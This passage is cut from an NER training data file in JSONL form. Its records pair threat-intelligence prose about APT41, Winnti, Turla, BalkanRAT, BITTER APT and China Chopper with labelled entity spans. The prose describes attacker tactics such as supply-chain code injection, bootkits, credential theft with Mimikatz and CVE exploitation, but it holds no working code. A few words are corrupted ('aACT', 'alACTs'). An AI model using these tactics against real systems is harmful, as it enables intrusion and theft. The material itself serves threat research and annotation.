"label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}]} {"text": "In a 2018 blogpost , ESET researchers predicted that Turla would use more and more generic tools . By 2014 , the Winnti malware code was no longer limited to game manufacturers . Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Winnti is attacking companies in Japan , France , the U.S. and Germany . The Winnti hackers broke into Henkel\u2019s network in 2014 . Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . 
The hackers behind Winnti have also set their sights on Japan\u2019s biggest chemical company , Shin-Etsu Chemical . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . Winnti hackers also penetrated the BASF and Siemens networks . Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . To witnesses , the spy appears to be running a program showing videos , presenting slides ( Prezi ) , playing a computer game or even running a fake virus scanner .", "spans": [{"start": 21, "end": 25, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}, {"start": 113, "end": 119, "label": "Organization"}, {"start": 158, "end": 176, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 199, "end": 218, "label": "Organization"}, {"start": 243, "end": 267, "label": "Organization"}, {"start": 270, "end": 276, "label": "Organization"}, {"start": 347, "end": 353, "label": "Organization"}, {"start": 373, "end": 381, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}, {"start": 420, "end": 426, "label": "Organization"}, {"start": 597, "end": 603, "label": "Organization"}, {"start": 642, "end": 648, "label": "Organization"}, {"start": 704, "end": 710, "label": "Malware"}, {"start": 757, "end": 773, "label": "Organization"}, {"start": 776, "end": 794, "label": "Organization"}, {"start": 839, "end": 856, "label": "Organization"}, {"start": 859, "end": 865, "label": "Organization"}, {"start": 931, "end": 937, "label": "Organization"}, {"start": 966, "end": 970, "label": "Organization"}, {"start": 975, "end": 982, "label": "Organization"}, {"start": 983, "end": 991, "label": "Organization"}, {"start": 1057, "end": 
1077, "label": "Organization"}, {"start": 1103, "end": 1109, "label": "Organization"}, {"start": 1115, "end": 1124, "label": "Organization"}, {"start": 1131, "end": 1137, "label": "Organization"}, {"start": 1219, "end": 1226, "label": "System"}, {"start": 1285, "end": 1288, "label": "Organization"}, {"start": 1338, "end": 1355, "label": "Malware"}, {"start": 1358, "end": 1363, "label": "Malware"}]} {"text": "ESET researchers will continue monitoring new Turla activities and will publish relevant information on our blog . From the time of file creation , the attacker started working at least as early as July 2018 . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky\u2019s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . 
APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . APT41 has targeted organizations in 14 countries over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but aACT from direct intellectual property theft . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . Since 2017 , APT41's activities have included a series of supply chain compromises . 
The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not alACTs correlate with targeted users or organizations . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled \u4e2d\u6771\u547c\u5438\u5668\u75c7\u5019 \u7fa4(MERS)\u306e\u4e88\u9632 , \u201d which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . 
Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests . Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . 
Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . APT41 has also used credentials compromised in previous operations . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . 
Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . 
Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations . In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . 
In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 46, "end": 51, "label": "Organization"}, {"start": 152, "end": 160, "label": "Organization"}, {"start": 255, "end": 258, "label": "System"}, {"start": 300, "end": 311, "label": "Organization"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 404, "end": 406, "label": "System"}, {"start": 492, "end": 497, "label": "Organization"}, {"start": 502, "end": 508, "label": "Organization"}, {"start": 664, "end": 672, "label": "Organization"}, {"start": 675, "end": 681, "label": "Organization"}, {"start": 686, "end": 691, "label": "Organization"}, {"start": 824, "end": 829, "label": "Organization"}, {"start": 863, "end": 873, "label": "Organization"}, {"start": 876, "end": 885, "label": "Organization"}, {"start": 892, "end": 918, "label": "Organization"}, {"start": 1035, "end": 1042, "label": "Organization"}, {"start": 1098, "end": 1103, "label": "Organization"}, {"start": 1188, "end": 1207, "label": "Organization"}, {"start": 1338, "end": 1343, "label": "Organization"}, {"start": 1516, "end": 1521, "label": "Organization"}, {"start": 1800, "end": 1807, "label": "Organization"}, {"start": 1829, "end": 1848, "label": "Organization"}, {"start": 1974, "end": 1979, "label": "Organization"}, {"start": 2045, "end": 2052, "label": "Organization"}, {"start": 2219, "end": 2224, "label": "Organization"}, {"start": 2430, "end": 2435, "label": "Organization"}, {"start": 2598, "end": 2603, 
"label": "Organization"}, {"start": 2869, "end": 2874, "label": "Organization"}, {"start": 2904, "end": 2912, "label": "Organization"}, {"start": 3072, "end": 3077, "label": "Organization"}, {"start": 3216, "end": 3221, "label": "Organization"}, {"start": 3410, "end": 3417, "label": "Organization"}, {"start": 3528, "end": 3550, "label": "Organization"}, {"start": 3553, "end": 3563, "label": "Organization"}, {"start": 3570, "end": 3586, "label": "Organization"}, {"start": 3618, "end": 3623, "label": "Organization"}, {"start": 3637, "end": 3650, "label": "Organization"}, {"start": 3733, "end": 3749, "label": "Organization"}, {"start": 3752, "end": 3771, "label": "Organization"}, {"start": 3774, "end": 3789, "label": "Organization"}, {"start": 3800, "end": 3815, "label": "Organization"}, {"start": 3841, "end": 3846, "label": "Organization"}, {"start": 3858, "end": 3879, "label": "Organization"}, {"start": 3963, "end": 3968, "label": "Organization"}, {"start": 4077, "end": 4082, "label": "Organization"}, {"start": 4109, "end": 4137, "label": "Organization"}, {"start": 4238, "end": 4255, "label": "Organization"}, {"start": 4388, "end": 4393, "label": "Organization"}, {"start": 4431, "end": 4436, "label": "Organization"}, {"start": 4457, "end": 4463, "label": "System"}, {"start": 4467, "end": 4482, "label": "Organization"}, {"start": 4589, "end": 4594, "label": "Organization"}, {"start": 4605, "end": 4618, "label": "Organization"}, {"start": 4641, "end": 4646, "label": "Organization"}, {"start": 4732, "end": 4738, "label": "System"}, {"start": 4852, "end": 4857, "label": "Organization"}, {"start": 4869, "end": 4896, "label": "Organization"}, {"start": 5035, "end": 5040, "label": "Organization"}, {"start": 5059, "end": 5083, "label": "Organization"}, {"start": 5257, "end": 5259, "label": "Indicator"}, {"start": 5336, "end": 5341, "label": "Organization"}, {"start": 5360, "end": 5371, "label": "Organization"}, {"start": 5516, "end": 5521, "label": "Organization"}, 
{"start": 5545, "end": 5559, "label": "Organization"}, {"start": 5695, "end": 5700, "label": "Organization"}, {"start": 5710, "end": 5726, "label": "Organization"}, {"start": 5811, "end": 5816, "label": "Organization"}, {"start": 5837, "end": 5843, "label": "System"}, {"start": 6106, "end": 6134, "label": "Organization"}, {"start": 6139, "end": 6159, "label": "Organization"}, {"start": 6214, "end": 6219, "label": "Malware"}, {"start": 6315, "end": 6320, "label": "Organization"}, {"start": 6346, "end": 6363, "label": "Organization"}, {"start": 6449, "end": 6465, "label": "Organization"}, {"start": 6519, "end": 6524, "label": "Organization"}, {"start": 6563, "end": 6580, "label": "Organization"}, {"start": 6800, "end": 6816, "label": "Malware"}, {"start": 6834, "end": 6854, "label": "Malware"}, {"start": 6982, "end": 6987, "label": "Organization"}, {"start": 7100, "end": 7105, "label": "System"}, {"start": 7147, "end": 7152, "label": "Organization"}, {"start": 7253, "end": 7280, "label": "Organization"}, {"start": 7327, "end": 7341, "label": "Organization"}, {"start": 7344, "end": 7349, "label": "Organization"}, {"start": 7703, "end": 7708, "label": "Organization"}, {"start": 7738, "end": 7743, "label": "System"}, {"start": 7756, "end": 7774, "label": "System"}, {"start": 7775, "end": 7780, "label": "System"}, {"start": 7800, "end": 7808, "label": "Malware"}, {"start": 7814, "end": 7821, "label": "System"}, {"start": 7921, "end": 7929, "label": "Organization"}, {"start": 7944, "end": 7949, "label": "Organization"}, {"start": 8020, "end": 8025, "label": "Organization"}, {"start": 8096, "end": 8115, "label": "Organization"}, {"start": 8189, "end": 8194, "label": "Organization"}, {"start": 8275, "end": 8280, "label": "Organization"}, {"start": 8401, "end": 8406, "label": "Organization"}, {"start": 8609, "end": 8614, "label": "Organization"}, {"start": 8688, "end": 8693, "label": "Organization"}, {"start": 8746, "end": 8749, "label": "System"}, {"start": 8779, "end": 
8795, "label": "Organization"}, {"start": 8813, "end": 8820, "label": "Organization"}, {"start": 8821, "end": 8828, "label": "Organization"}, {"start": 8900, "end": 8910, "label": "Malware"}, {"start": 8930, "end": 8935, "label": "Organization"}, {"start": 9074, "end": 9079, "label": "Organization"}, {"start": 9217, "end": 9222, "label": "Organization"}, {"start": 9291, "end": 9296, "label": "Organization"}, {"start": 9309, "end": 9324, "label": "Malware"}, {"start": 9446, "end": 9473, "label": "Organization"}, {"start": 9583, "end": 9588, "label": "Organization"}, {"start": 9766, "end": 9775, "label": "Organization"}, {"start": 9783, "end": 9788, "label": "Organization"}, {"start": 9834, "end": 9844, "label": "Malware"}, {"start": 9930, "end": 9937, "label": "Organization"}, {"start": 10099, "end": 10104, "label": "Organization"}, {"start": 10178, "end": 10199, "label": "Organization"}, {"start": 10460, "end": 10467, "label": "Organization"}, {"start": 10477, "end": 10495, "label": "Organization"}, {"start": 10508, "end": 10515, "label": "Organization"}, {"start": 10589, "end": 10594, "label": "Organization"}, {"start": 10633, "end": 10649, "label": "Organization"}, {"start": 10743, "end": 10748, "label": "Organization"}, {"start": 10861, "end": 10866, "label": "Organization"}, {"start": 11029, "end": 11034, "label": "Organization"}, {"start": 11198, "end": 11203, "label": "Organization"}, {"start": 11221, "end": 11226, "label": "Organization"}, {"start": 11271, "end": 11291, "label": "Malware"}, {"start": 11378, "end": 11386, "label": "Indicator"}, {"start": 11425, "end": 11431, "label": "Organization"}, {"start": 11601, "end": 11606, "label": "Organization"}, {"start": 11727, "end": 11735, "label": "Malware"}, {"start": 11738, "end": 11746, "label": "Malware"}, {"start": 11749, "end": 11754, "label": "Malware"}, {"start": 11757, "end": 11761, "label": "Malware"}, {"start": 11768, "end": 11775, "label": "Malware"}, {"start": 11793, "end": 11801, "label": 
"Malware"}, {"start": 11857, "end": 11862, "label": "Organization"}, {"start": 11882, "end": 11887, "label": "Organization"}, {"start": 11906, "end": 11919, "label": "Organization"}, {"start": 11924, "end": 11946, "label": "Organization"}, {"start": 11949, "end": 11957, "label": "Malware"}, {"start": 11976, "end": 11984, "label": "Malware"}, {"start": 11993, "end": 11998, "label": "Organization"}, {"start": 12057, "end": 12063, "label": "Organization"}, {"start": 12076, "end": 12080, "label": "Organization"}, {"start": 12083, "end": 12088, "label": "Organization"}, {"start": 12091, "end": 12096, "label": "Organization"}, {"start": 12099, "end": 12104, "label": "Organization"}, {"start": 12111, "end": 12116, "label": "Organization"}, {"start": 12119, "end": 12124, "label": "Organization"}, {"start": 12134, "end": 12147, "label": "Malware"}, {"start": 12271, "end": 12279, "label": "Malware"}, {"start": 12374, "end": 12386, "label": "Malware"}, {"start": 12391, "end": 12400, "label": "Malware"}, {"start": 12421, "end": 12426, "label": "Organization"}, {"start": 12475, "end": 12480, "label": "Organization"}, {"start": 12501, "end": 12526, "label": "Malware"}, {"start": 12574, "end": 12597, "label": "Organization"}, {"start": 12615, "end": 12620, "label": "Organization"}, {"start": 12721, "end": 12726, "label": "Organization"}, {"start": 12737, "end": 12747, "label": "Malware"}, {"start": 12846, "end": 12851, "label": "Organization"}, {"start": 12892, "end": 12897, "label": "Organization"}, {"start": 12903, "end": 12913, "label": "Malware"}, {"start": 12955, "end": 12965, "label": "Organization"}, {"start": 12966, "end": 12973, "label": "Organization"}, {"start": 12986, "end": 12991, "label": "Organization"}, {"start": 13028, "end": 13035, "label": "Vulnerability"}, {"start": 13045, "end": 13058, "label": "Vulnerability"}, {"start": 13097, "end": 13102, "label": "Organization"}, {"start": 13116, "end": 13132, "label": "Organization"}]} {"text": "ESET researchers analyze 
new TTPs attributed to the Turla group that leverage PowerShell to run malware in-memory only . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 52, "end": 57, "label": "Organization"}, {"start": 78, "end": 88, "label": "System"}, {"start": 225, "end": 232, "label": "System"}, {"start": 257, "end": 265, "label": "Malware"}, {"start": 270, "end": 284, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 520, "end": 525, "label": "Organization"}, {"start": 550, "end": 561, "label": "Malware"}, {"start": 578, "end": 593, "label": "Malware"}, {"start": 596, "end": 604, "label": "Malware"}, {"start": 607, "end": 615, "label": "Malware"}, {"start": 618, "end": 640, "label": "Malware"}, {"start": 685, "end": 690, "label": "Organization"}, {"start": 701, "end": 709, "label": "Malware"}, {"start": 768, "end": 773, "label": "Organization"}, {"start": 878, "end": 898, "label": "System"}, {"start": 899, "end": 904, "label": "System"}]} {"text": "ESET have been tracking the malicious activities related to the Ke3chang group . 
In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . APT41 has been observed creating a RAR archive of targeted files for Exfiltration . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and Cyber Espionage operations from 2014 onward . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . 
For example , the group has repeatedly targeted call record information at telecom companies . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . The group\u2019s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware . In another instance , APT41 targeted a hotel\u2019s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . These supply chain compromise tactics have also been characteristic of APT41\u2019s best known and most recent espionage campaigns . Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers . Mapping the group\u2019s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group\u2019s later espionage operations . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . 
APT41 often relies on spear-phishing emails with attachments such as compiled HTML ( .chm ) files to initially compromise their victims .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 64, "end": 72, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 117, "end": 127, "label": "Malware"}, {"start": 168, "end": 185, "label": "Malware"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 337, "end": 343, "label": "System"}, {"start": 460, "end": 465, "label": "Organization"}, {"start": 483, "end": 487, "label": "Malware"}, {"start": 492, "end": 501, "label": "Malware"}, {"start": 618, "end": 635, "label": "Malware"}, {"start": 638, "end": 643, "label": "Organization"}, {"start": 701, "end": 706, "label": "Malware"}, {"start": 894, "end": 899, "label": "Organization"}, {"start": 975, "end": 978, "label": "Indicator"}, {"start": 1086, "end": 1088, "label": "Indicator"}, {"start": 1107, "end": 1112, "label": "Organization"}, {"start": 1191, "end": 1196, "label": "Organization"}, {"start": 1404, "end": 1409, "label": "Organization"}, {"start": 1719, "end": 1724, "label": "Organization"}, {"start": 1814, "end": 1819, "label": "Organization"}, {"start": 1839, "end": 1855, "label": "Organization"}, {"start": 1858, "end": 1873, "label": "Organization"}, {"start": 1880, "end": 1896, "label": "Organization"}, {"start": 2063, "end": 2070, "label": "Organization"}, {"start": 2071, "end": 2080, "label": "Organization"}, {"start": 2083, "end": 2088, "label": "Organization"}, {"start": 2161, "end": 2171, "label": "Organization"}, {"start": 2174, "end": 2183, "label": "Organization"}, {"start": 2190, "end": 2208, "label": "Organization"}, {"start": 2209, "end": 2216, "label": "Organization"}, {"start": 2291, "end": 2310, "label": "Organization"}, {"start": 2319, "end": 2324, "label": "Organization"}, {"start": 2424, "end": 2429, "label": "Organization"}, {"start": 2666, "end": 2673, "label": "Organization"}, 
{"start": 2864, "end": 2869, "label": "Organization"}, {"start": 3080, "end": 3085, "label": "Organization"}, {"start": 3214, "end": 3219, "label": "Organization"}, {"start": 3261, "end": 3280, "label": "Organization"}, {"start": 3372, "end": 3377, "label": "Organization"}, {"start": 3420, "end": 3436, "label": "Malware"}, {"start": 3441, "end": 3446, "label": "Malware"}, {"start": 3640, "end": 3645, "label": "Organization"}, {"start": 3715, "end": 3720, "label": "Organization"}, {"start": 3752, "end": 3758, "label": "System"}, {"start": 3793, "end": 3797, "label": "System"}, {"start": 3800, "end": 3804, "label": "Indicator"}]} {"text": "According to Kaspersky Lab\u2019s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 \u2013 2013 . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and aACT from direct intellectual property theft since 2015 . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . 
The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen\u2026 and using BalkanRAT , they can do whatever they want on the computer . The BalkanDoor backdoor does not implement any Exfiltration channel . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . Based on the Let\u2019s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . 
One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . Further analysis of the BITTER APT\u2019s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group\u2019s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user\u2019s credentials . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People\u2019s Republic of China . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . 
China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . Here , we investigate a campaign targeting an Asian government organization . We observed another campaign targeting an organisation located in Lebanon . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . The attacker obtains the required privileges 